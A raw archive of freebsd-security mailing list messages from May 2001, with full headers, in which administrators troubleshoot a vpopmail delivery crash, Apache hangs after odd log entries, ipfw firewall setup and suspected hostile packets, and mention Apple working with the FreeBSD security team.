Qmail + FreeBSD 4.3 -- resolved Date: Tue, 22 May 2001 23:53:31 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 In-Reply-To: <20010522193427.A20063@darkstar.gte.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thanks for the advice everyone, but it looks like the problem just recently came out on the vpopmail site! (today infact)... http://inter7.com/vpopmail/ They completely re-wrote vdelivermail.. but i think im going to wait for a stable release.. just deal with pages of vdelivermail exit 11's Thanks, -Dan Graaff / Digital The DE-Network -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Robert Clark Sent: Tuesday, May 22, 2001 7:34 PM To: Olivier Nicole Cc: veldy@veldy.net; glassfish@frogbox.dyndns.org; freebsd-security@FreeBSD.ORG Subject: Re: Qmail + FreeBSD 4.3 Or it fails some number of years later, when you power it on. [RC] On Wed, May 23, 2001 at 07:58:31AM +0700, Olivier Nicole wrote: > Hi, > > As a good rule, hardware fails in the first hour after turning the > power on for the first time, or it will fails some months/years later. > > Like anything, hardware do wear off, let say your CPU fan lightly slow > down, it means CPU heat increase. Memory and card connectors are > submitted to vibrations, even if not perceptible to human, so the > contacts get oxyded (sp?). Examples could be multiple, it is not just > disk mortors that fails. > > Best regards, > > olivier > > > Well bad hardware is less likely than its trying to overwrite memory it > > doesn't own. If he is being attacked, and it is a buffer overflow exploit, > > than overwriting memory it doesn't own is more likely than it being > > repeatidly hardware, especially after his system has been working fine all > > this time. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 23 1: 1: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from mout0.freenet.de (mout0.freenet.de [194.97.50.131]) by hub.freebsd.org (Postfix) with ESMTP id 91F2137B43C for ; Wed, 23 May 2001 01:00:58 -0700 (PDT) (envelope-from michael.radzewitz@freenet-ag.de) Received: from [194.97.50.144] (helo=mx1.freenet.de) by mout0.freenet.de with esmtp (Exim 3.22 #1) id 152TZh-0008On-00 for security@freebsd.org; Wed, 23 May 2001 10:00:57 +0200 Received: from staff.freenet-ag.de ([62.104.227.5]) by mx1.freenet.de with esmtp (Exim 3.22 #1) id 152TZh-00074a-00 for security@freebsd.org; Wed, 23 May 2001 10:00:57 +0200 Received: by staff.freenet-ag.de with Internet Mail Service (5.5.2653.19) id ; Wed, 23 May 2001 10:00:56 +0200 Message-ID: From: Michael Radzewitz To: "'security@freebsd.org'" Subject: RE: apache_logs/system hang up Date: Wed, 23 May 2001 10:00:46 +0200 X-Mailer: Internet Mail Service (5.5.2653.19) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello Marc, the system wasn't able to do anything so that i had to reset it by hand. Tonight the same thing happend. Acctually I would think there must be something wrong on my site. The characters contain nothing else than hundreds of these: ^@^@^@ They do not look like a typically binary file. It's always the same corner of the internet which one of my users visit and which causes the trouble one minute later. Today I plugged a monitor in to see what happend and i got the message: login: unable to login followed by a kernel panic and the normal core dump output of a linux system. As I mentioned before I thing there is something wrong on my site but I am a little bit concerned about the: unable to login message. I will monitor this problem until the end of the week - maybe i get some more information about it. Later than I will swap the system to FreeBSD. Thank's Michael > -----Ursprüngliche Nachricht----- > Von: Marc Rogers [mailto:marcr@shady.org] > Gesendet: Mittwoch, 23. Mai 2001 00:55 > An: Michael Radzewitz > Betreff: Re: apache_logs/system hang up > > > > When you mean hang, do you mean that it was unresponsive, > or do you mean that you actualy tried to get a response from > a console keyboard? > > In my experience an attack is more likely to suck resources from > a system, making it unresponsive, or very very slow to respond. > > A complete lockup is most often caused by a hardware issue. > > when you mention "non ascii" characters, do you mean special > ascii characters, such as ^@ ^M ï Ä etc? Was it a similar > effect to reading a binary file? > > > Marc Rogers > Technical Director > European Data Corporation > > On Tue, May 22, 2001 at 05:13:35PM +0200, Michael Radzewitz wrote: > > Hello, > > > > i've have posted this question before without a subject. > > sorry for that and please ignore the last mail. > > > > Once again... > > > > ...a short question because i am concerned about a log entry > > in the apache access and error logs. > > > > Last night I had to reset my system because it hangs. > > Today I've found two entry's in the logfiles mentioned > > above. They contain lots of non assci characters. > > I am not able to get some more information about the > > content. For me it seems to be binary-code. > > > > The log entry looks something like this > > > > lot's of: ^@^@^@ttp://www. followed by the address > > | > > | > > my editor > > display it like this (vim) > > > > > > > > I'm wondering if it's possible to send such informations over the > > http-protcol which causes the apache and the rest of the system to > > hang up or maybe it's just a hang up because god knows what went > > wrong at that time with the hard or software. > > > > Maybe one of you had the same problem or any other idea. > > > > Thank's in advance > > > > Michael > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 23 1:37:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from kalaid.f2f.com.ua (kalaid.f2f.com.ua [62.149.0.33]) by hub.freebsd.org (Postfix) with ESMTP id D63F037B424 for ; Wed, 23 May 2001 01:37:05 -0700 (PDT) (envelope-from never@mail.uic-in.net) Received: from mail.uic-in.net (root@[212.35.189.4]) by kalaid.f2f.com.ua (8.11.3/8.11.1) with ESMTP id f4N8cna86135; Wed, 23 May 2001 11:39:02 +0300 (EEST) (envelope-from never@mail.uic-in.net) Received: (from never@localhost) by mail.uic-in.net (8.11.3/8.11.3) id f4N8ajG19230; Wed, 23 May 2001 11:36:46 +0300 (EEST) (envelope-from never) Date: Wed, 23 May 2001 11:36:45 +0300 From: "Alexandr P. Kovalenko" To: Michael Radzewitz Cc: "'security@freebsd.org'" Subject: Re: apache_logs/system hang up Message-ID: <20010523113645.A19181@uic-in.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from michael.radzewitz@freenet-ag.de on Wed, May 23, 2001 at 10:00:46AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, Michael Radzewitz! On Wed, May 23, 2001 at 10:00:46AM +0200, you wrote: > Hello Marc, > > the system wasn't able to do anything so that i had to reset it by hand. > Tonight the same thing happend. Acctually I would think there must be > something wrong on my site. The characters contain nothing else > than hundreds of these: ^@^@^@ > They do not look like a typically binary file. It's always the same > corner of the internet which one of my users visit and which causes the > trouble one minute later. > > Today I plugged a monitor in to see what happend and i got the message: > > login: unable to login > > followed by a kernel panic and the normal core dump output of a linux > system. > > As I mentioned before I thing there is something wrong on my site > but I am a little bit concerned about the: unable to login message. > I will monitor this problem until the end of the week - maybe i get some > more information about it. Later than I will swap the system to FreeBSD. Sorry, what apache versions are you running and what are uname -a's ? /me have similar situation, periodically machine locks up. When on last second I'm able to run top I see that swap is filled and apache is about 350Mb.... Maybe it is common problem/security issue -- NEVE-RIPE ICQ: 36925929 http://www.nevermind.kiev.ua/ Powered by caffeine. Made with beer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 23 2:38:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from mout1.freenet.de (mout1.freenet.de [194.97.50.132]) by hub.freebsd.org (Postfix) with ESMTP id ABDF337B43C for ; Wed, 23 May 2001 02:38:29 -0700 (PDT) (envelope-from michael.radzewitz@freenet-ag.de) Received: from [194.97.50.144] (helo=mx1.freenet.de) by mout1.freenet.de with esmtp (Exim 3.22 #1) id 152V64-00014S-00 for security@freebsd.org; Wed, 23 May 2001 11:38:28 +0200 Received: from staff.freenet-ag.de ([62.104.227.5]) by mx1.freenet.de with esmtp (Exim 3.22 #1) id 152V64-0001Al-00 for security@freebsd.org; Wed, 23 May 2001 11:38:28 +0200 Received: by staff.freenet-ag.de with Internet Mail Service (5.5.2653.19) id ; Wed, 23 May 2001 11:38:26 +0200 Message-ID: From: Michael Radzewitz To: "'security@freebsd.org'" Subject: RE: apache_logs/system hang up Date: Wed, 23 May 2001 11:38:18 +0200 X-Mailer: Internet Mail Service (5.5.2653.19) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello Alexandr, currently the system is running under redhat linux 6.2 with kernel 2.2.14-5.0 and apache 1.3.14 on a intel i686 I try to reproduce this error. I think it's a security issue and should be disscused when a unnormal http-request is able to stop a running system. > -----Ursprüngliche Nachricht----- > Von: Alexandr P. Kovalenko [mailto:never@uic-in.net] > Gesendet: Mittwoch, 23. Mai 2001 10:37 > An: Michael Radzewitz > Cc: 'security@freebsd.org' > Betreff: Re: apache_logs/system hang up > > > Hello, Michael Radzewitz! > > On Wed, May 23, 2001 at 10:00:46AM +0200, you wrote: > > > Hello Marc, > > > > the system wasn't able to do anything so that i had to > reset it by hand. > > Tonight the same thing happend. Acctually I would think > there must be > > something wrong on my site. The characters contain nothing else > > than hundreds of these: ^@^@^@ > > They do not look like a typically binary file. It's always the same > > corner of the internet which one of my users visit and > which causes the > > trouble one minute later. > > > > Today I plugged a monitor in to see what happend and i got > the message: > > > > login: unable to login > > > > followed by a kernel panic and the normal core dump output > of a linux > > system. > > > > As I mentioned before I thing there is something wrong on my site > > but I am a little bit concerned about the: unable to login message. > > I will monitor this problem until the end of the week - > maybe i get some > > more information about it. Later than I will swap the > system to FreeBSD. > Sorry, what apache versions are you running and what are uname -a's ? > /me have similar situation, periodically machine locks up. > When on last second I'm able to run top I see that swap is > filled and apache is > about 350Mb.... Maybe it is common problem/security issue > > -- > NEVE-RIPE > ICQ: 36925929 http://www.nevermind.kiev.ua/ > Powered by caffeine. Made with beer. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 23 5:37:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from scooby.netsville.com (scooby.netsville.com [206.27.96.131]) by hub.freebsd.org (Postfix) with ESMTP id 6D2F837B42C for ; Wed, 23 May 2001 05:37:10 -0700 (PDT) (envelope-from brandon@vv.com) Received: from brandon by scooby.netsville.com with local (Exim 3.22 #1 (Debian)) id 152XsX-0005UT-00; Wed, 23 May 2001 08:36:41 -0400 Date: Wed, 23 May 2001 08:36:41 -0400 From: Micah Brandon To: Dan Graaff Cc: Robert Clark , Olivier Nicole , veldy@veldy.net, glassfish@frogbox.dyndns.org, freebsd-security@FreeBSD.ORG Subject: Re: Qmail + FreeBSD 4.3 -- resolved Message-ID: <20010523083641.C21004@vv.com> References: <20010522193427.A20063@darkstar.gte.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.17i In-Reply-To: ; from subscribed@de-net.org on Tue, May 22, 2001 at 11:53:31PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * Dan Graaff (subscribed@de-net.org) [010523 02:56]: > Thanks for the advice everyone, but it looks like the problem just recently > came out on the vpopmail site! (today infact)... http://inter7.com/vpopmail/ > They completely re-wrote vdelivermail.. but i think im going to wait for a > stable release.. just deal with pages of vdelivermail exit 11's I just jumped on this list and I don't know if this was covered but I had this EXACT same problem and the reason was there was the .qmail-default forwarding file which looked something like this: | /usr/local/vpopmail/bin/vdelivermail '' /usr/local/vpopmail/domains// Problem was, it pointed to a local "" that did not exist! So, I highly doubt someone is attacking your machine. Sure, this was some kind of bug in vdelivermail as it shouldn't have died like that. They've probably corrected this in the newest version. I'd check all your .qmail-default's (or any other .qmail files) that may be misdirected as such. You might be able to tell which is fouled up by associating the exit 11 with a previous delivery attempt line in your maillog file. -- Micah Brandon brandon@vv.com Netsville, Inc. http://www.netsville.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 23 9:16:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from prox.centtech.com (moat2.centtech.com [206.196.95.21]) by hub.freebsd.org (Postfix) with ESMTP id 839F037B423 for ; Wed, 23 May 2001 09:16:30 -0700 (PDT) (envelope-from anderson@centtech.com) Received: (from smap@localhost) by prox.centtech.com (8.9.3+Sun/8.9.3) id IAA18095; Wed, 23 May 2001 08:13:32 -0500 (CDT) Received: from proton.centtech.com(10.177.173.77) by prox via smap (V2.1+anti-relay+anti-spam) id xma018093; Wed, 23 May 01 08:13:20 -0500 Message-ID: <3B0BB771.C03A9DD7@centtech.com> Date: Wed, 23 May 2001 08:13:21 -0500 From: Eric Anderson Reply-To: anderson@centtech.com Organization: Centaur Technology X-Mailer: Mozilla 4.77 [en] (X11; U; Linux 2.2.14-5.0smp i686) X-Accept-Language: en MIME-Version: 1.0 To: Michael Radzewitz Cc: "'security@freebsd.org'" Subject: Re: apache_logs/system hang up References: Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org It may very well be security related, but it doesn't sound too FreeBSD related. More apache and linux. Good luck with it... Eric Michael Radzewitz wrote: > > Hello Alexandr, > > currently the system is running under redhat linux 6.2 > with kernel 2.2.14-5.0 and apache 1.3.14 on a intel i686 > > I try to reproduce this error. I think it's a security > issue and should be disscused when a unnormal http-request > is able to stop a running system. > > > -----Ursprüngliche Nachricht----- > > Von: Alexandr P. Kovalenko [mailto:never@uic-in.net] > > Gesendet: Mittwoch, 23. Mai 2001 10:37 > > An: Michael Radzewitz > > Cc: 'security@freebsd.org' > > Betreff: Re: apache_logs/system hang up > > > > > > Hello, Michael Radzewitz! > > > > On Wed, May 23, 2001 at 10:00:46AM +0200, you wrote: > > > > > Hello Marc, > > > > > > the system wasn't able to do anything so that i had to > > reset it by hand. > > > Tonight the same thing happend. Acctually I would think > > there must be > > > something wrong on my site. The characters contain nothing else > > > than hundreds of these: ^@^@^@ > > > They do not look like a typically binary file. It's always the same > > > corner of the internet which one of my users visit and > > which causes the > > > trouble one minute later. > > > > > > Today I plugged a monitor in to see what happend and i got > > the message: > > > > > > login: unable to login > > > > > > followed by a kernel panic and the normal core dump output > > of a linux > > > system. > > > > > > As I mentioned before I thing there is something wrong on my site > > > but I am a little bit concerned about the: unable to login message. > > > I will monitor this problem until the end of the week - > > maybe i get some > > > more information about it. Later than I will swap the > > system to FreeBSD. > > Sorry, what apache versions are you running and what are uname -a's ? > > /me have similar situation, periodically machine locks up. > > When on last second I'm able to run top I see that swap is > > filled and apache is > > about 350Mb.... Maybe it is common problem/security issue > > > > -- > > NEVE-RIPE > > ICQ: 36925929 http://www.nevermind.kiev.ua/ > > Powered by caffeine. Made with beer. > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- ------------------------------------------------------------------------------- Eric Anderson anderson@centtech.com Centaur Technology (512) 418-5792 The idea is to die young as late as possible. ------------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 23 9:52: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from msa4.hinet.net (msa4.hinet.net [168.95.4.214]) by hub.freebsd.org (Postfix) with ESMTP id 5144637B422 for ; Wed, 23 May 2001 09:52:03 -0700 (PDT) (envelope-from clive@tongi.org) Received: from cartier.cirx.org (cartier.cirx.org [211.72.15.243]) by msa4.hinet.net (8.8.8/8.8.8) with SMTP id AAA05270; Thu, 24 May 2001 00:51:40 +0800 (CST) Received: (nullmailer pid 75218 invoked by uid 1000); Wed, 23 May 2001 16:51:39 -0000 Date: Thu, 24 May 2001 00:51:39 +0800 From: Clive Lin To: Matthew Jacob Cc: security@FreeBSD.ORG Subject: Re: ftp security (fwd) Message-ID: <20010524005139.B73422@cartier.cirx.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from mjacob@feral.com on Tue, May 22, 2001 at 07:35:56PM -0700 X-PGP-key: http://www.cirx.org/~clive/clive.asc Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, May 22, 2001 at 07:35:56PM -0700, Matthew Jacob wrote: > > > ---------- Forwarded message ---------- > Date: Wed, 23 May 2001 09:59:08 +0800 (CST) > From: "[gb2312] Gang Li" > To: freebsd-bugs@FreeBSD.ORG, freebsd-bug@FreeBSD.ORG > Subject: ftp security > > hi, > I find ftp.cn.freebsd.org/pub/ports/distfiles > has 777 privilliage,I think it is no good, if it is an I think phj@cn.FreeBSD.org is in charge of this box. (And other FreeBSD boxes live in Mainland China.) I've forwarded this message to him. > error, pls check it soon. > wish you be better. -- Clive Lin (Tong-I Lin)\n =P clive@tongi.org # Family, friends, private affairs\n =F clive@FreeBSD.org # Chinese ports, documentation\n =O clive@CirX.ORG # Others\n =J.* # What do you think about the 'J' ?\n To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 23 14:50:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from stella.pyramus.com (stella.pyramus.com [206.129.206.3]) by hub.freebsd.org (Postfix) with ESMTP id 54D3037B43C for ; Wed, 23 May 2001 14:50:11 -0700 (PDT) (envelope-from turtle@pyramus.com) Received: from pyramus.com (jerry.pyramus.com [206.129.206.8]) by stella.pyramus.com (8.9.3/8.9.3) with ESMTP id OAA23464 for ; Wed, 23 May 2001 14:53:45 -0700 (PDT) (envelope-from turtle@pyramus.com) Message-ID: <3B0C3130.11D3DCBA@pyramus.com> Date: Wed, 23 May 2001 14:52:49 -0700 From: Bill Mitcheson X-Mailer: Mozilla 4.75 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: ipfw problems. Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I am having major problems setting up one of my computers as a firewall machine. I rebuilt the kernel as listed in the diary. I followed all instructions at www.freebsddiary.org/ipfw.php and I can not get it to pass packets from an outside machine to the inside machine. I can ping my router on the outside from the LAN address 10.10.1.2 but not vice versa. I may need someone to hold my hand through the setup process so I can get it right. Any help you may provide will be appreciated! Bill Mitcheson. Network Administrator, Pyramus Online. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 23 15:15:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from R181204.resnet.ucsb.edu (R181204.resnet.ucsb.edu [128.111.181.204]) by hub.freebsd.org (Postfix) with ESMTP id 5C9F437B423 for ; Wed, 23 May 2001 15:15:15 -0700 (PDT) (envelope-from mudman@R181204.resnet.ucsb.edu) Received: from localhost (mudman@localhost) by R181204.resnet.ucsb.edu (8.11.1/8.11.1) with ESMTP id f4NMOtk73666 for ; Wed, 23 May 2001 15:24:55 -0700 (PDT) (envelope-from mudman@R181204.resnet.ucsb.edu) Date: Wed, 23 May 2001 15:24:55 -0700 (PDT) From: mudman To: Subject: service attacks Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm somewhat of a greenhorn on how packets are handled in FreeBSD. Apparently, some character has been throwing some bad packets at me. Kernel message like: arp: bad hardware address format (0x800) Then like 3 hours later (probably after a very slow, stealthly port scan), two of my services on high ports segfault. If someone sends a packet to port XXXX, does it get dropped or filtered by the kernel if it is bad, or is the information processing up to the service on port XXXX? Actually, a few of those services really don't need to be accessed by the outside world. I'm thinking of setting up IPFW. Anyway, what should I make of this? Oh yeah, one more thing. tcpdump has bogus ip addresses (japan, france, korea, etc..). Err, not to assert these places are bogus, but with the way they vary I think it is the same person falsifying packets w/ different sources. This individual has been bothering me since January actually (with this stuff as well as DoS/packet spam). I would like to get him sent to prison. Any suggestions how I go about finding out who he is and how to put him out? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 23 15:38:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id 166CC37B43E for ; Wed, 23 May 2001 15:38:25 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GDT87E00.69R; Wed, 23 May 2001 15:38:02 -0700 Message-ID: <3B0C3BE0.F263E036@globalstar.com> Date: Wed, 23 May 2001 15:38:24 -0700 From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: mudman Cc: freebsd-security@FreeBSD.ORG Subject: Re: service attacks References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org mudman wrote: > > I'm somewhat of a greenhorn on how packets are handled in FreeBSD. > Apparently, some character has been throwing some bad packets at me. > Kernel message like: > > arp: bad hardware address format (0x800) > > Then like 3 hours later (probably after a very slow, stealthly port scan), > two of my services on high ports segfault. The two are not likely related. The 'bad hardware address format' error indicates that there is some problem, or something the kernel does not understand anyway, in the link layer header. A link layer header does not cross the Internet. Unless your attacker is on your LAN, i.e. no router between you two, he could not be causing the ARP messages. > If someone sends a packet to port XXXX, does it get dropped or filtered by > the kernel if it is bad, or is the information processing up to the > service on port XXXX? Depends on what you mean by "bad information." As for your ARP messages, those frames are never going to even get processed at the IP layer. If the information in packet headers is "bad," the kernel will not understand them and drop the packet. If the kernel understands the headers, the information is not "bad" and it gets to where it is supposed to go. > Actually, a few of those services really don't need to be accessed by the > outside world. I'm thinking of setting up IPFW. Good. > Anyway, what should I make of this? If people are crashing your services, you need to (a) turn them off if you don't really need them, (b) patch them if they have known problems, or (c) firewall them so only the people you have some trust in can access them. > Oh yeah, one more thing. tcpdump has bogus ip addresses (japan, france, > korea, etc..). Err, not to assert these places are bogus, but with the > way they vary I think it is the same person falsifying packets w/ > different sources. Why do you think that? > This individual has been bothering me since January actually (with this > stuff as well as DoS/packet spam). I would like to get him sent to > prison. Any suggestions how I go about finding out who he is and how to > put him out? How do you know this is one person now? All you can (should) do is collect information about the data being sent to you and try to trace it back to the attacker(s). -- Crist J. Clark Network Security Engineer crist.clark@globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster@globalstar.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 23 16:16: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 44E4F37B424 for ; Wed, 23 May 2001 16:16:06 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 45214 invoked from network); 23 May 2001 23:19:04 -0000 Received: from localhost (HELO book) (root@127.0.0.1) by localhost with SMTP; 23 May 2001 23:19:04 -0000 Message-ID: <000b01c0e3de$5ce01c90$01000001@book> From: "alexus" To: "Bill Mitcheson" , References: <3B0C3130.11D3DCBA@pyramus.com> Subject: Re: ipfw problems. Date: Wed, 23 May 2001 19:16:14 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org show us your /etc/rc.conf file ----- Original Message ----- From: "Bill Mitcheson" To: Sent: Wednesday, May 23, 2001 5:52 PM Subject: ipfw problems. > I am having major problems setting up one of my computers as a firewall > machine. I rebuilt the kernel as listed in the diary. I followed all > instructions at www.freebsddiary.org/ipfw.php and I can not get it to > pass packets from an outside machine > to the inside machine. I can ping my router on the outside from the LAN > address 10.10.1.2 but not vice versa. I may need someone to hold my hand > > through the setup process so I can get it right. Any help you may > provide > will be appreciated! > > Bill Mitcheson. > Network Administrator, > Pyramus Online. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 23 16:34:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from mighty.grot.org (mighty.grot.org [216.15.97.5]) by hub.freebsd.org (Postfix) with ESMTP id 0F3D237B42C for ; Wed, 23 May 2001 16:34:12 -0700 (PDT) (envelope-from lists@grot.org) Received: by mighty.grot.org (Postfix, from userid 998) id B96775DA6; Wed, 23 May 2001 16:34:07 -0700 (PDT) Date: Wed, 23 May 2001 16:34:07 -0700 From: "R.P. Aditya" To: freebsd-security@freebsd.org Subject: Apple and FreeBSD Security Collaboration Message-ID: <20010523163407.A77156@mighty.grot.org> Reply-To: "R.P. Aditya" Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Add another feather to the cap of FreeBSD: From http://www.apple.com/support/security/security.html Collaboration with other security groups ... Apple also works very closely with the FreeBSD Security team to analyze and release patches for security vulnerabilities. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 23 16:36:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 01E7C37B424 for ; Wed, 23 May 2001 16:36:23 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 45296 invoked from network); 23 May 2001 23:39:20 -0000 Received: from localhost (HELO book) (root@127.0.0.1) by localhost with SMTP; 23 May 2001 23:39:20 -0000 Message-ID: <001a01c0e3e1$320e0420$01000001@book> From: "alexus" To: Cc: Subject: =?euc-kr?B?UmU6ILjewM8gwPy82yC9x8bQIL7LuLIgPG5ldGJ1aWxkZXJAbmF2ZXIuY28=?= =?euc-kr?B?bT4=?= Date: Wed, 23 May 2001 19:36:31 -0400 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0017_01C0E3BF.AAD63E80" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0017_01C0E3BF.AAD63E80 Content-Type: text/plain; charset="euc-kr" Content-Transfer-Encoding: quoted-printable =B3=D7=C0=CC=B9=F6 =B8=DE=C0=CFplease take this e-mail off of the list thank you ----- Original Message -----=20 From: NAVER-MAILER@naver.com=20 To: ml@db.nexgen.com=20 Sent: Wednesday, May 23, 2001 7:16 PM Subject: =B8=DE=C0=CF =C0=FC=BC=DB =BD=C7=C6=D0 =BE=CB=B8=B2 = =20 =20 =B9=DA=C1=F8=C7=FC (netbuilder) =B4=D4=B2=B2 =BA=B8=B3=BB=BD=C5 = =B8=DE=C0=CF =C0=CC =B4=D9=C0=BD=B0=FA =B0=B0=C0=BA = 